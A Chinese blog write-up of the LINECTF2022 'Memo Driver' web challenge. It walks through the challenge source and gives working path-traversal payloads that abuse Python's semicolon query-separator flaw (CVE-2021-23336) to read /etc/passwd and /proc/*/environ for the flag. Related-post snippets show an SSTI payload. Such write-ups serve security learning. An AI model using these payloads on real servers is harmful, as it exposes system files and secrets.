LINECTF2022 web之Memo Driver完整题解

已于 2023-03-19 02:27:45 修改
阅读量343 收藏 2
点赞数
文章标签: python web安全 网络安全 安全 网络
于 2023-03-18 17:54:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38338511/article/details/129640342
版权

下载题目源码打开index.py进行分析

def view(request):
    context = {}

    try:
        context['request'] = request
        clientId = getClientID(request.client.host)

        if '&' in request.url.query or '.' in request.url.query or '.' in unquote(request.query_params[clientId]):
            raise
        
        filename = request.query_params[clientId]
        path = './memo/' + "".join(request.query_params.keys()) + '/' + filename
        
        f = open(path, 'r')
        contents = f.readlines()
        f.close()
        
        context['filename'] = filename
        context['contents'] = contents

这题重点的地方在于path,会进行读取输出,flag在上一个目录

构造Pyload

http://d1824416-68cd-4a2b-b176-a12ff2bab504.node4.buuoj.cn:81/view?67eb9cc01b6d566e811945ab5b376ac5=../flag

没绕过request.query和request.queryparam,一个是用;代替&分隔,因为是python3.9.0服务器的缘故,存在CVE-2021-23336漏洞,详情可看这里:urllib parse_qsl(): Web cache poisoning - semicolon as a query args separator — Python Security 0.0 documentation

构造Payload

/view?id=flag;/%2e%2e/         #每个环境id都不一,根据自己情况修改

http://d1824416-68cd-4a2b-b176-a12ff2bab504.node4.buuoj.cn:81/view?67eb9cc01b6d566e811945ab5b376ac5=flag;/%2e%2e/

fcfe85461034487dae4d1fa4efac39f9.png

发现flag文件里没有我们需要的flag,以BUU环境的习惯,肯定是又藏在了env环境变量里了

/view?id=etc/passwd;/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ 

 /view?id=proc/self/environ;/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/

 fbd1a763d887448f907cac24330830ec.png

发现还是没有flag,尝试bp爆破PID 。(以CTF出题人的习惯)

/proc/{pid}/environ 常用来读取环境变量中的SECRET_KEY或FLAG

a30121184e514e329d5c4b8f4283dc5c.png

最终的pyload

 /view?id=proc/1/environ;/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/

http://d1824416-68cd-4a2b-b176-a12ff2bab504.node4.buuoj.cn:81/view?67eb9cc01b6d566e811945ab5b376ac5=proc/1/environ;/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/

 flag{164a7a69-230f-4cd8-8cdf-69f81dd9f674}

 

小古_
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
linectf2022 online-library_[LineCTF2022]gotm
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-05 862
linectf2022 online-library_[LineCTF2022]gotm linectf2022 online-library源码,分析一下几个路由和对应的请求处理函数, [LineCTF2022]gotm注册功能:func regist_handler(w http.ResponseWriter, r *http.Request) { uid := r.FormValue("id") upw := r.FormValue("pw") if uid == "" ||
LineCTF2022Memo Driver
weixin_60581972的博客
09-30 587
在proc/self/cmdline 发现pythonindex.py 最后 也没能读取出来...hh。再之后读取proc/self/environ 发现一个假的flag。之后就想着嗖哈一把嗦,直接bp跑脚本,没想到第一个就是 = =这里发现memo,以为是读取命令执行记录(错误示范...)详细绕过可以去看这个文章,这里只是寻找buu flag。读取无果之后最后只能尝试其他方法了。
[LineCTF2022]Memo Drive
qq_41513009的博客
05-12 192
漏洞的成因是 Starlette 错误地把分号当成参数的分割符,分号后面的字符串将被当成query_params.keys(),因此如果参数设置成view?/会被当成query_params.keys()拼接到filename之前,最终代码中的path就会变成。这里涉及到CVE-2021-23336:https://github.com/encode/starlette/issues/1325。但是这只是一个假的flag,我们需要使用burp爆破目录读取文件,发现在/proc/1/environ中。
CTF-WEB_ctf代码(1)
最新发布
2401_84297035的博客
04-28 557
*在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。> **但是此时浏览器渲染的%00可以直接手动换为具体的字符串,或者在菜鸟工具里面把最后一行加个urlencode()函数编码,直接编码为url,避免在序列化内容过多的时候手动该%00过于麻烦,但是此时就需要在一堆编码里面准确的找到类的个数是哪个,一般来说类的个数处于两个冒号之间,冒号的url编码是%3A,所以找到偏前面一点的,在两个%3A之间的数字改大一点就可以了****一个人可以走的很快,但一群人才能走的更远!
[LineCTF2022]BB
Sk1y的博客
06-18 1517
八进制,RCE,利用环境变量进行注入
[LineCTF2022]gotm ( golang SSTI + JWT伪造 )
ShenZ的博客
04-15 5336
我们的思路是利用ssti得到secret_key,再伪造jwt即可得到flag。 如果是正常思路我们应该{{.secret_key}}注入得到key字段,但是root_handler函数中得到的acc是数组中的地址,也就是get_account函数通过在全局变量acc数组中查找我们的用户,这种情况下直接注入{{.secret_key}}会返回空 我们的payload应该是{{.}},可以得到 Account结构的所有字段 /regist?id={{.}}&pw=123 /auth?id={{.}}&
web-roam::memo:前端漫游
03-29
:memo:欢迎来到的SedationH的计算机世界 :smiling_face_with_smiling_eyes:耐下心,慢慢积累 :red_heart:基础决定了未来的路能走多远,能走多快学习,是为了更好的生活,也是为了更好的认识这个有趣的世界。
STM32F1xx_HAL_Driver_HAL库stm32_memo_stm32hal_
10-03
STM32F1xx_HAL_Driver是ST Microelectronics(意法半导体)为STM32F1系列微控制器设计的一个驱动程序库,它基于HAL(Hardware Abstraction Layer,硬件抽象层)。HAL库的主要目的是提供一种独立于具体硬件的编程接口...
note::memo: Web 开发笔记
04-29
【标题】:“Web开发笔记”概述 在Web开发领域,涵盖了许多不同的技术和工具,这些技术和工具共同构建了我们日常浏览的互联网世界。本笔记主要关注Web开发的基础与进阶,包括操作系统和虚拟化、数据库管理、命令行...
recv_memo.zip_memo
09-14
标题中的"recv_memo.zip_memo"表明这是一个与接收或存储备忘录相关的压缩文件,可能包含多种格式的记录,如文本、音频等。描述中提到的"File already exists(DMExplorer.zip), please upload others.back"揭示了一个...
Java_learning_memo.zip_memo
09-24
"Java_learning_memo.zip_memo"这个压缩文件显然包含了作者对于Java学习的深入理解和关键要点的总结,旨在帮助初学者和初次接触Java的人快速入门并掌握基础知识。 在"Java学习笔记.doc"文档中,我们可以期待找到...
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
一套简单的ctf_web源码环境.zip
10-02
一套简单的ctf_web源码环境。
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
express.js-ctf:用express.js编写的CTF挑战
05-04
express.js-ctf 智力,技能等方面的测试。
2022 lineCTF WEB复现WriteUp
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-06 672
lineCTF WEB复现WriteUp Gotm, is_admin == true就给flag,需要伪造token,需要秘钥才行 再往下看,经典SSTI 如果能控制acc也就是id为{{.}},就能得到这三个的值,然后id可控,直接打就行了 接下来思路就很简单了,先注册一个id为{{.}}的用户: is_admin == true就给flag,需要伪造token,需要秘钥才行 再往下看,经典SSTI, 如果能控制acc也就是id为{{.}},就能得到这三个的值,然后id可控,直接打就行了 接下来思路就很
buuctf 2022 3.9
m0_57754423的博客
03-10 4786
ciscn_2019_es_1 保护机制: 保护全开 漏洞点: 这里指针未清空,存在uaf漏洞。 利用思路: 首先malloc一个size大于0x408的chunk,这样的话 就可以绕过tcache了。 然后free掉,之后再dump一下,就可以泄露main_arena + 96 的地址了 这样就可以获得 libc的基地址 和 free_hook了 利用tcache 的double free漏洞 修改fd指针 然后malloc 这样就可以写入free_hook为 one_gad
CTFHub | 网站源码
尼泊罗河伯的博客
10-04 1787
根据题目介绍,这题应该是访问网站目录可以查看到泄露的备份源码,一开始使用手工随机试了几个看看能不能运气好直接查到,最后还是选择写了个小脚本。
7月28日ctfweb源码泄露及代码审计训练题
slc3315的博客
07-28 2851
1.试试手 题目: // 题目是php界面信息 <?php highlight_file(__FILE__); include 'flag.php'; if (isset($_GET['p1'])){ if ($_GET['p1'] > 99999999 && strlen($_GET['p1']) < 9){ echo "111"; if (isset ( $_GET ['p2'] )) { $
react memo
08-18
React.memo 是 React 提供的一个高阶组件 (HOC)。它的作用是优化 React 组件的性能,避免不必要的渲染。 当一个组件的 props 没有发生变化时,React.memo 可以阻止组件的重新渲染。它会对组件的 props 进行浅比较,如果前后两次的 props 没有变化,则跳过渲染,直接使用上一次的渲染结果。 使用 React.memo 可以减少组件的渲染次数,提高应用的性能。特别是在组件树中的某个组件频繁地接收相同的 props 时,使用 React.memo 可以有效地避免不必要的渲染。 使用 React.memo 的方式很简单,只需将组件作为参数传递给 React.memo 函数即可,例如: ``` const MyComponent = React.memo((props) => { // 组件的渲染逻辑 }); ``` 需要注意的是,React.memo 只会对 props 进行浅比较。如果组件内部有复杂的数据结构或引用类型的 props,应该确保它们的变化能够正确地被检测到。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小古_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值